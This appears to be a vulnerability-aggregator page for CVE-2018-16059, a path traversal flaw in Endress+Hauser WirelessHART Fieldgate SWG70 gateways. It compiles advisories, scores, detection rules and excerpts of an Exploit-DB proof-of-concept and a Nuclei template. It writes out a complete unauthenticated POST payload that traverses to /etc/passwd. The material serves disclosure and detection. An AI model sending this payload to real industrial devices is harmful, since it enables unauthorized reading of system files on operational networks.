CVE-2018-16059
published 2018-09-07CVE-2018-16059: Endress+Hauser WirelessHART Fieldgate SWG70 3.x devices allow Directory Traversal via the fcgi-bin/wgsetcgi filename parameter.
PriorityP278medium5.3CVSS 3.0
AVNACLPRNUINSUCLINAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
29.82%
98.0th percentile
Endress+Hauser WirelessHART Fieldgate SWG70 3.x devices allow Directory Traversal via the fcgi-bin/wgsetcgi filename parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| endress | wirelesshart_fieldgate_swg70_firmware | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandaction=ajax&command=4&filename=../../../../../../../../../../etc/passwd&origin=cw.Communication.File.Read&transaction=fileCommand↗
- →Detect POST requests to /fcgi-bin/wgsetcgi containing directory traversal sequences in the 'filename' parameter, specifically targeting /etc/passwd. ↗
- →Look for the specific POST body parameters: action=ajax, command=4, origin=cw.Communication.File.Read, and transaction=fileCommand combined with path traversal in the filename field. ↗
- →A successful exploitation response will contain /etc/passwd content; match on 'root:.*:0:0:' in the HTTP response body with a 200 status code. ↗
- →The exploit uses Content-Type: application/x-www-form-urlencoded in POST requests to the vulnerable CGI endpoint; monitor for this combination on ICS/OT network segments. ↗
- ·The vulnerability is unauthenticated (PR:N) and remotely exploitable with low attack complexity, meaning no credentials are required to trigger the path traversal. ↗
- ·Both Endress+Hauser SWG70 3.x and all PEPPERL+FUCHS WHA-GW-* products are affected, broadening the detection scope beyond a single vendor. ↗
- ·Public exploit code is available (Exploit-DB 45342), meaning automated/scripted exploitation is trivial and should be expected in the wild. ↗
CVSS provenance
nvdv3.05.3MEDIUMCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
vulncheck5.3MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA ICS
PEPPERL+FUCHS WirelessHART-Gateways
cisa_ics·2019-03-14·CVSS 5.3
[MEDIUM] PEPPERL+FUCHS WirelessHART-Gateways
## Archived Content In an effort to keep CISA.gov current, the archive contains outdated information that may not reflect current policy or programs.
ICS Advisory
##
PEPPERL+FUCHS WirelessHART-Gateways
Last RevisedMarch 14, 2019
Alert CodeICSA-19-073-03
## 1. EXECUTIVE SUMMARY
-
CVSS v3 5.3
- ATTENTION: Exploitable remotely/low skill level to exploit/public exploits are available
- Vendor: PEPPERL+FUCHS
- Equipment: WirelessHART-Gateways
- Vulnerability: Path Traversal
## 2. RISK EVALUATION
Successful exploitation of this vulnerability could allow access to files and restricted directories stored on the device through the manipulation of file parameters.
## 3. TECHNICAL DETAILS
## 3.1 AFFECTED PRODUCTS
- PEPPERL+FUCHS reports that a
GHSA
GHSA-f7v2-j977-j9v3: Endress+Hauser WirelessHART Fieldgate SWG70 3
ghsa_unreviewed·2022-05-14
CVE-2018-16059 [MEDIUM] CWE-22 GHSA-f7v2-j977-j9v3: Endress+Hauser WirelessHART Fieldgate SWG70 3
Endress+Hauser WirelessHART Fieldgate SWG70 3.x devices allow Directory Traversal via the fcgi-bin/wgsetcgi filename parameter.
VulnCheck
endress wirelesshart_fieldgate_swg70_firmware Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
vulncheck·2018·CVSS 5.3
CVE-2018-16059 [MEDIUM] endress wirelesshart_fieldgate_swg70_firmware Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
endress wirelesshart_fieldgate_swg70_firmware Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Endress+Hauser WirelessHART Fieldgate SWG70 3.x devices allow Directory Traversal via the fcgi-bin/wgsetcgi filename parameter.
Affected: endress wirelesshart_fieldgate_swg70_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-22&host_type=src&vulnerability=cve-2018-16059; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-24&host_type=src&vulnerability=cve-2018-16059; https://dashboard.shadowserver.org/stati
No detection rules found.
Exploit-DB
WirelessHART Fieldgate SWG70 3.0 - Directory Traversal
exploitdb·2018-09-06
CVE-2018-16059 WirelessHART Fieldgate SWG70 3.0 - Directory Traversal
WirelessHART Fieldgate SWG70 3.0 - Directory Traversal
---
# Exploit Title: WirelessHART Fieldgate SWG70 3.0 - Directory Traversal
# Date: 2018-08-29
# Exploit Author: Hamit CİBO
# Vendor Homepage: http://endress.com
# Software Link: https://www.endress.com/en/Field-instruments-overview/System-Components-Recorder-Data-Manager/wirelesshart-gateway-fieldgate-swg70
# Version: SWG70 3.X
# Tested on: Windows
# CVE :
# PoC
# Request
POST /fcgi-bin/wgsetcgi HTTP/1.1
Content-Length: 129
Content-Type: application/x-www-form-urlencoded
Referer: {Target}
Cookie: ********
Host: {Target}
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0(Windows NT 6.1;WOW64)AppleWebKit/537.21(KHTML,like Gecko)Chrome/41.0.2228.0 Safari/537.21
Accept: */*
action=ajax&command=4&filename=../
Nuclei
WirelessHART Fieldgate SWG70 3.0 - Local File Inclusion
nuclei·CVSS 5.3
CVE-2018-16059 [MEDIUM] WirelessHART Fieldgate SWG70 3.0 - Local File Inclusion
WirelessHART Fieldgate SWG70 3.0 - Local File Inclusion
WirelessHART Fieldgate SWG70 3.0 is vulnerable to local file inclusion via the fcgi-bin/wgsetcgi filename parameter.
Template:
id: CVE-2018-16059
info:
name: WirelessHART Fieldgate SWG70 3.0 - Local File Inclusion
author: daffainfo
severity: medium
description: WirelessHART Fieldgate SWG70 3.0 is vulnerable to local file inclusion via the fcgi-bin/wgsetcgi filename parameter.
impact: |
Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the system, potentially leading to unauthorized access or information disclosure.
remediation: |
Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in WirelessHART Fieldgate SWG70 3.0.
reference:
- https://ww
http://www.securityfocus.com/bid/107416https://cert.vde.com/en-us/advisories/vde-2019-002https://ics-cert.us-cert.gov/advisories/ICSA-19-073-03https://www.exploit-db.com/exploits/45342/http://www.securityfocus.com/bid/107416https://cert.vde.com/en-us/advisories/vde-2019-002https://ics-cert.us-cert.gov/advisories/ICSA-19-073-03https://www.exploit-db.com/exploits/45342/
2018-09-07
Published
Exploited in the wild